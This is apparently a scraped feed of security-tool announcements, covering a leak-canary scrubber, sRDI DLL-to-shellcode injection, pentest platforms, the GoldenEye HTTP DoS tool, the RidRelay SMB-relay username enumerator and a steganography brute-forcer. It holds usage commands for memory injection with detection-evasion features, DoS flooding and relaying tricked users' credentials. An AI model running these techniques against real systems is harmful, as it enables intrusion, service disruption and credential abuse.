Individuals attempting to leak an email or other text file face the risk of identification through fingerprinting. Fingerprinting often occurs when the original distributor of the document has embedded some form of a canary. For example, Elon Musk's email in 2008 in response to leaks featured slightly different wording for each employee. This tactic was realized by the employees, and failed. An easier tactic that is also employed, is the presence of nearly invisible changes to the text. SafeText is designed to identify and remove these changes. Specifically this tool will remove homoglyphs, zero-width characters, and other subtle characters. This tool will also attempt to identify unique spelling of words that could give away an individual's location.

Usage
To use SafeText, call:
python safetext.py inputfile
Example output is:
λ python safetext.py TestFile.txt
[*] Cleaning TestFile.txt to TestFile.txt.safe ...
[!] FOUND HOMOGLYPHIC CHARACTER CYRILLIC_large_H ON LINE 1
The message said: "(Н)ey, let's hang out!"
[!] FOUND a SPACE ON LINE # 2
Lorem*Ipsum*Dolor*Sit
[!] WARNING - Use of spelling (colour) that identifies country on line 3
[!] FOUND HOMOGLYPHIC CHARACTER GREEK_B ON LINE 5
[!] FOUND HOMOGLYPHIC CHARACTER GREEK_C ON LINE 5
Subject: (Β)udget (Ϲ)uts
[*] Output file closed
Note: The relevant characters will be underlined - not enclosed by parentheses. SafeText will output to infile.safe.


sRDI - Shellcode Implementation Of Reflective DLL Injection

$
0
0

sRDI allows for the conversion of DLL files to position independent shellcode.
Functionality is accomplished via two components:
  • C project which compiles a PE loader implementation (RDI) to shellcode
  • Conversion code which attaches the DLL, RDI, and user data together with a bootstrap

This project is comprised of the following elements:
  • ShellcodeRDI: Compiles shellcode for the DLL loader
  • NativeLoader: Converts DLL to shellcode if neccesarry, then injects into memory
  • DotNetLoader: C# implementation of NativeLoader
  • Python\ConvertToShellcode.py: Convert DLL to shellcode in place
  • Python\EncodeBlobs.py: Encodes compiled sRDI blobs for static embedding
  • PowerShell\ConvertTo-Shellcode.ps1: Convert DLL to shellcode in place
  • FunctionTest: Imports sRDI C function for debug testing
  • TestDLL: Example DLL that includes two exported functions for call on Load and after
The DLL does not need to be compiled with RDI, however the technique is cross compatiable.

Use Cases / Examples
Before use, is recommend to you become familiar with Reflective DLL Injection and it's purpose.

Convert DLL to shellcode using python
from ShellcodeRDI import *

dll = open("TestDLL_x86.dll", 'rb').read()
shellcode = ConvertToShellcode(dll)

Load DLL into memory using C# loader
DotNetLoader.exe TestDLL_x64.dll

Convert DLL with python script and load with Native EXE
python ConvertToShellcode.py TestDLL_x64.dll
NativeLoader.exe TestDLL_x64.bin

Convert DLL with powershell and load with Invoke-Shellcode
Import-Module .\Invoke-Shellcode.ps1
Import-Module .\ConvertTo-Shellcode.ps1
Invoke-Shellcode -Shellcode (ConvertTo-Shellcode -File TestDLL_x64.dll)

Stealth Considerations
There are many ways to detect memory injection. The loader function implements two stealth improvments on traditional RDI:
  • Proper Permissions: When relocating sections, memory permissions are set based on the section characteristics rather than a massive RWX blob.
  • PE Header Cleaning (Optional): The DOS Header and DOS Stub for the target DLL are completley wiped with null bytes on load (Except for e_lfanew). This can be toggled with 0x1 in the flags argument for C/C#, or via command line args in Python/Powershell.

Building
This project is built using Visual Studio 2015 (v140) and Windows SDK 8.1. The python script is written using Python 3.
The Python and Powershell scripts are located at:
  • Python\ConvertToShellcode.py
  • PowerShell\ConvertTo-Shellcode.ps1
After building the project, the other binaries will be located at:
  • bin\NativeLoader.exe
  • bin\DotNetLoader.exe
  • bin\TestDLL_.dll
  • bin\ShellcodeRDI_.bin

Faraday v3.0 - Collaborative Penetration Test and Vulnerability Management Platform

$
0
0

This new version has made major architectural changes to adapt the software to the new challenges of cybersecurity. It focuses on processing large volumes of data and facilitating user interaction with Faraday in their environment.

Faraday just got much faster

Architecture changes and a new database (PostgreSQL) gives us a new and revamped structure that allows us to support new objects and a bigger data volume. This dramatically improves most of the backend services that directly impact your day-to-day use...

Big changes require time

The total amount of work, in terms of commits, for the migration consisted of 29% of the total work done for the the project to this day. We changed and reviewed around 75440 lines of code, including the addition a lot of unit tests.

Commits per week on faraday code repository from July 2017 to June 2018

 What’s new on the Backend
  • New Server: Implemented with Flask.
  • New Database engine: PostgreSQL.
  • New REST API: With complete support for CRUD for every object from Faraday. It makes it simpler to do queries for the DB and it opens up new ways for personalized integrations. Run python manage.py show_urls to see all our new API endpoints.
Example usage for getting hosts from the new api:
curl 'http://localhost:5985/_api/v2/ws/europe/hosts'  -H 'Cookie: AuthSession=[COOKIE]; session=[COOKIE];'
  • Better scalability and performance improvements. There’s a drastic reduction in time needed for searches in our API and with the new architecture it’s significantly easier to scale-up horizontally.

What’s new on the front

For this version we listened to feedback from our users to make Faraday friendlier with a major focus on making specific data more readily available and a faster interface.

The new dashboard

The new dashboard has been organized with a new layout to show relevant information first, helping users to find vulnerable spots in their workspace.


Updated Status Report

Changed and simplified the status report design:


Redesign of the hosts list

Now you can add and remove columns, plus see and filter by hostnames and services:


Small improvements that make your day

  • Imports Scan Outputs directly from the Web UI.
    • Now you can import results from your scans directly on our Web UI:



Check here a video about report upload from WebGUI:


  • Import Scan Outputs via API.
Here’s an example of the new API:

curl 'http://127.0.0.1:5985/_api/v2/ws/test/upload_report' -H 'Content-Type: multipart/form-data' -H 'Cookie: AuthSession=[COOKIE]; session=[COOKIE];' --data-binary $’[FILE BINARY DATA]’ --compressed
  • Dramatic performance upgrades.
  • Simplification of the model we used. Say "adios" to the interface object.
  • Access to the server using “/” instead of /_ui/ .
  • Ability to edit the names of workspaces.

New Plugins
  • HP WebInspect
  • IP360
  • Sslyze
  • Wfuzz
  • Xsssniper
  • Brutexss
  • Recon-NG
  • Sublist3r
  • Dirsearch

Full List of Changes
  • Allow faraday-server to have multiple instances
  • Add hostname to host
  • Interface removed from model and from persistence server lib (fplugin)
  • Performance improvements on the backend
  • Add quick change workspace name (from all views)
  • Allow user to change workspace
  • New faraday styles in all Webui views
  • Add search by id for vulnerabilities
  • Add new plugin Sslyze
  • Add new plugin Wfuzz
  • Add xsssniper plugin
  • Fix W3af, Zap plugins
  • Add Brutexss plugin
  • Allow to upload report file from external tools from the web
  • Fix sshcheck import file from GTK
  • Add reconng plugin
  • Add sublist3r plugin
  • Add HP Webinspect plugin
  • Add dirsearch plugin
  • Add ip360 plugin
  • CouchDB was replaced by PostgreSQL :)
  • Host object changed, now the name property is called ip
  • Interface object was removed
  • Note object was removed and replaced with Comment
  • Communication object was removed and replaced with Comment
  • Show credentials count in summarized report on the dashboard
  • Remove vuln template CWE fields, join it with references
  • Allow to search hosts by hostname, os and service name
  • Allow the user to specify the desired fields of the host list table
  • Add optional hostnames, services, MAC and description fields to the host list
  • Workspace names can be changed from the Web UI
  • Changed the scope field of a workspace from a free text input to a list of targets
  • Exploitation and severity fields only allow certain values. 
  • CWE CVEs were fixed to be valid. A script to convert custom CSVs was added.
  • Web UI path changed from /ui/ to / (ui has now a redirection to / for keeping backwards compatibility)
  • dirb plugin should creates a vulnerability type information instead of a note.
  • Add confirmed column to exported CSV from Webui
  • Fixes in Arachni plugin
  • Add new parameters --keep-old and --keep-new for faraday CLI
  • Add new screenshot fplugin which takes a screenshot of the ip:ports of a given protocol
  • Add fix for net sparker regular and cloud fix on severity
  • Admin users can list and access all workspaces, even if they don't have permissions
  • Removed Chat feature (data is kept inside notes)
  • Plugin reports now can be imported in the server, from the Web UI
  • Add CVSS score to reference field in Nessus plugin.
  • Fix unicode characters bug in Netsparker plugin.
  • Fix Qualys plugin.
  • Fix bugs with MACOS and GTK.
  • Add response field added to model in grouped report template.
  • Add tooltip in WebUi with information about errors in executive report.
  • Ldap now login is with user@domain.com, not user only anymore.
  • Fix Jira bugs in WebUi

https://www.faradaysec.com
https://forum.faradaysec.com/
https://www.faradaysec.com/ideas
https://github.com/infobyte/faraday
https://twitter.com/faradaysec

WTF - A Personal Information Dashboard For Your Terminal

$
0
0

A personal terminal-based dashboard utility, designed for displaying infrequently-needed, but very important, daily data.

Quick Start
Download and run the latest binary or install from source:
go get -u github.com/senorprogrammer/wtf
cd $GOPATH/src/github.com/senorprogrammer/wtf
make install
make run
Note: WTF is only compatible with Go versions 1.9.2 or later. It currently does not compile with gccgo.

Documentation
See https://wtfutil.com for the definitive documentation. Here's some short-cuts:


OWTF v2.4 - Offensive Web Testing Framework

$
0
0

OWASP OWTF is a project focused on penetration testing efficiency and alignment of security tests to security standards like the OWASP Testing Guide (v3 and v4), the OWASP Top 10, PTES and NIST so that pentesters will have more time to
  • See the big picture and think out of the box
  • More efficiently find, verify and combine vulnerabilities
  • Have time to investigate complex vulnerabilities like business logic/architectural flaws or virtual hosting sessions
  • Perform more tactical/targeted fuzzing on seemingly risky areas
  • Demonstrate true impact despite the short timeframes we are typically given to test.
The tool is highly configurable and anybody can trivially create simple plugins or add new tests in the configuration files without having any development experience.
Note: This tool is however not a silverbullet and will only be as good as the person using it: Understanding and experience will be required to correctly interpret tool output and decide what to investigate further in order to demonstrate impact.

Requirements
OWTF is developed on KaliLinux and macOS but it is made for Kali Linux (or other Debian derivatives)
OWTF supports both Python2 and Python3.

Installation
Recommended:
Using a virtualenv is highly recommended!
pip install git+https://github.com/owtf/owtf#egg=owtf
or clone the repo and
python setup.py install

If you want to change the database password in the Docker Compose setup, edit the environment variables in the docker-compose.yml file. If you prefer to override the environment variables in a .env file, use the file name owtf.env so that Docker Compose knows to include it.
To run OWTF on Windows or MacOS, OWTF uses Docker Compose. You need to have Docker Compose installed (check by docker-compose -v). After installing Docker Compose, simply run docker-compose up and open localhost:8009 for the OWTF web interface.

Install on OSX
Dependencies: Install Homebrew (https://brew.sh/) and follow the steps given below:
$ virtualenv <venv name>  $ source <venv name>/bin/activate  $ brew install coreutils gnu-sed openssl  # We need to install 'cryptography' first to avoid issues  $ pip install cryptography --global-option=build_ext --global-option="-L/usr/local/opt/openssl/lib" --global-option="-I/usr/local/opt/openssl/include"  $ git clone <this repo>  $ cd owtf  $ python setup.py install  # Run OWTF!  $ owtf  

Features
  • Resilience: If one tool crashes OWTF, will move on to the next tool/test, saving the partial output of the tool until it crashed.
  • Flexible: Pause and resume your work.
  • Tests Separation: OWTF separates its traffic to the target into mainly 3 types of plugins:
    • Passive : No traffic goes to the target
    • Semi Passive : Normal traffic to target
    • Active: Direct vulnerability probing
  • Extensive REST API.
  • Has almost complete OWASP Testing Guide(v3, v4), Top 10, NIST, CWE coverage.
  • Web interface: Easily manage large penetration engagements easily.
  • Interactive report:
  • Automated plugin rankings from the tool output, fully configurable by the user.
  • Configurable risk rankings
  • In-line notes editor for each plugin.

Links

Screenshots












Neto - A Tool To Analyse Browser Extensions

$
0
0

Project Neto is a Python 3 package conceived to analyse and unravel hidden features of browser plugins and extensions for well-known browsers such as Firefox and Chrome. It automates the process of unzipping the packaged files to extract these features from relevant resources in a extension like manifest.json, localization folders or Javascript and HTML source files.

Installation
To install the package, the user can choose pip3.
pip3 install -e . --user
Optionally, it can also be installed with administrator privileges using sudo:
sudo pip3 install -e .
A successfull installation can be checked using:
python3 -c "import neto; print(neto.__version__)"

Quick Start
To perform the analysis of an extension, the analyst can type the following:
neto analysis -u https://yoururl.com/extension-name.xpi
The extension will be automatically downloaded and unzipped by default in the system's temporal folder.
However, the analyst can also launch de analysis towards a locally stored extension:
neto analysis -e ./my-extension-name.xpi
After the static analysis is performed, it will generate a Json file that is stored by default in a newly created folder named output.
If you use Python, you can also import the package as a library in your own Python modules:
>>> from neto.lib.extensions import Extension
>>> my_extension = Extension ("./sample.xpi")
>>> my_extension.filename
'adblock_for_firefox-3.8.0-an+fx.xpi'
>>> my_extension.digest
'849ec142a8203da194a73e773bda287fe0e830e4ea59b501002ee05121b85a2b'
Apart from accesing to the elements found in the extension using properties, the analyst can always have access to it as a dictionary:
>>> my_extension.__dict__
{'_analyser_version': '0.0.1', '_digest': '849ec142a8203da194a73e773bda287fe0e830e4ea59b501002ee05121b85a2b'…
If you are not using Python, you can use the JSON RPC daemon:
$ neto daemon

____ _ _ _ _ _
| _ \ _ __ ___ (_) ___ ___| |_ | \ | | ___| |_ ___
| |_) | '__/ _ \| |/ _ \/ __| __| | \| |/ _ \ __/ _ \
| __/| | | (_) | | __/ (__| |_ | |\ | __/ || (_) |
|_| |_| \___// |\___|\___|\__| |_| \_|\___|\__\___/
|__/

Developed by @ElevenPaths
Version: 0.5.0b


* Running on http://localhost:14041/ (Press CTRL+C to quit)
You can then run commands using your preferred JSON RPC library to write a client (we have written a short demo in the bin folder) or even curl:
 curl --data-binary '{"id":0, "method":"remote", "params":["https://example.com/myextension.xpi"], "jsonrpc": "2.0"}'  -H 'content-type:text/json;' http://localhost:14041

Features
The following is a non-exhaustive list of the features included in this package are the following:
  • Manifest analysis.
  • Internal file hashing.
  • Entities extraction using regular expressions: IPv4, email, cryptocurrency addresses, URL, etc.
  • Comments extraction from HTML, CSS and JS files.
  • Cryptojacking detection engine based on known mining domains and expressions.
  • Suspicious Javascript code detection such as eval().
  • Certificate analysis if provided.
  • Batch analysis of previously downloaded extensions.


GoldenEye v1.2.0 - Layer 7 (KeepAlive+NoCache) DoS Test Tool

$
0
0

GoldenEye is an python app for SECURITY TESTING PURPOSES ONLY!
GoldenEye is a HTTP DoS Test Tool.
Attack Vector exploited: HTTP Keep Alive + NoCache

Usage
 USAGE: ./goldeneye.py <url> [OPTIONS]

OPTIONS:
Flag Description Default
-u, --useragents File with user-agents to use (default: randomly generated)
-w, --workers Number of concurrent workers (default: 50)
-s, --sockets Number of concurrent sockets (default: 30)
-m, --method HTTP Method to use 'get' or 'post' or 'random' (default: get)
-d, --debug Enable Debug Mode [more verbose output] (default: False)
-n, --nosslcheck Do not verify SSL Certificate (default: True)
-h, --help Shows this help

Utilities

Changelog
  • 2016-02-06 Added support for not verifying SSL Certificates
  • 2014-02-20 Added randomly created user agents (still RFC compliant).
  • 2014-02-19 Removed silly referers and user agents. Improved randomness of referers. Added external user-agent list support.
  • 2013-03-26 Changed from threading to multiprocessing. Still has some bugs to resolve like I still don't know how to propperly shutdown the manager.
  • 2012-12-09 Initial release

To-do
  • Change from getopt to argparse
  • Change from string.format() to printf-like

LEGAL NOTICE
THIS SOFTWARE IS PROVIDED FOR EDUCATIONAL USE ONLY! IF YOU ENGAGE IN ANY ILLEGAL ACTIVITY THE AUTHOR DOES NOT TAKE ANY RESPONSIBILITY FOR IT. BY USING THIS SOFTWARE YOU AGREE WITH THESE TERMS.


Ridrelay - Quick And Easy Way To Get Domain Usernames While On An Internal Network

$
0
0

Enumerate usernames on a domain where you have no creds by using SMB Relay with low priv. Quick and easy way to get domain usernames while on an internal network.

How it works
RidRelay combines the SMB Relay attack, common lsarpc based queries and RID cycling to get a list of domain usernames. It takes these steps:
  1. Spins up an SMB server and waits for an incoming SMB connection
  2. The incoming credentials are relayed to a specified target, creating a connection with the context of the relayed user
  3. Queries are made down the SMB connection to the lsarpc pipe to get the list of domain usernames. This is done by cycling up to 50000 RIDs
(For best results, use with Responder)

Dependencies
  • Python 2.7 (sorry but impacket doesn't play nice with 3 :( )
  • Impacket v0.9.17 or above

Installation
pipenv install --two
pipenv shell

# Optional: Run if installing impacket
git submodule update --init --recursive
cd submodules/impacket
python setup.py install
cd ../..

Usage
First, find a target host to relay to. The target must be a member of the domain and MUST have SMB Signin off. CrackMapExec can get this info for you very quick!
Start RidRelay pointing to the target:
python ridrelay.py -t 10.0.0.50
OR
Also output usernames to file
python ridrelay.py -t 10.0.0.50 -o path_to_output.txt
Highly Recommended: Start Responder to trick users to connecting to RidRelay

TODO:
  • Add password policy enumeration
  • Dynamic relaying based on where incoming creds have admin rights
  • Getting active sessions???
  • Connect with Bloodhound???


StegCracker - Steganography Brute-Force Utility To Uncover Hidden Data Inside Files

$
0
0

Steganography brute-force utility to uncover hidden data inside files.

Usage
Using stegcracker is simple, pass a file to it as it's first parameter and optionally pass the path to a wordlist of passwords to try as it's second parameter. If this is not set it will default to the rockyou.txt password file which ships with Kali Linux or can be downloaded here.
$ stegcracker <file> [<wordlist>]

Installation
To install the program, follow these steps:
$ sudo apt-get install steghide -y
$ sudo curl https://raw.githubusercontent.com/Paradoxis/StegCracker/master/stegcracker > /bin/stegcracker
$ sudo chmod +x /bin/stegcracker


Viewing all 5854 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>